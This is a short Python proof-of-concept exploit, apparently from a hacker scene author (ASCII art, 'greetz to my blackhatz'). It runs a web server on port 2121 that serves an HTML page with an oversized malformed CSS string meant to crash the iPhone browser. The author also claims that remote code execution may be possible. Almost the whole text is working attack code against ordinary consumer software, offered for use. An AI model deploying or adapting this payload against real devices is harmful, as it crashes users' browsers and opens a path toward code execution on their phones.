#!/usr/bin/python # , # dM # MMr # 4MMML . # MMMMM. xf # . "M6MMM .MM- # Mh.. +MM5MMM .MMMM # .MMM. .MMMMML. MMMMMh # )MMMh. MM5MMM MMMMMMM # 3MMMMx. 'MMM3MMf xnMMMMMM" # '*MMMMM MMMMMM. nMMMMMMP" # *MMMMMx "MMM5M\ .MMMMMMM= # *MMMMMh "MMMMM" JMMMMMMP # MMMMMM GMMMM. dMMMMMM . # MMMMMM "MMMM .MMMMM( .nnMP" # .. *MMMMx MMM" dMMMM" .nnMMMMM* # "MMn... 'MMMMr 'MM MMM" .nMMMMMMM*" # "4MMMMnn.. *MMM MM MMP" .dMMMMMMM"" # ^MMMMMMMMx. *ML "M .M* .MMMMMM**" # *PMMMMMMhn. *x > M .MMMM**"" # ""**MMMMhx/.h/ .=*" # .3P"%.... # [t12] nP" "*MMnx # SMOKE WEED #greetz to my blackhatz and baycatz #iPhone CSS::Selector crash #this Python script acts as a web server and sends a malformed long string to the CSS <style> tag #this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy import sys, socket; def main(): junk = "*>" * 120000; html = """ <html> <head> <style type="text/css"> """; html += junk; html += """ body {background: blue;} </style> </head> </html> """; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(1024); channel.send(html); channel.close(); main();
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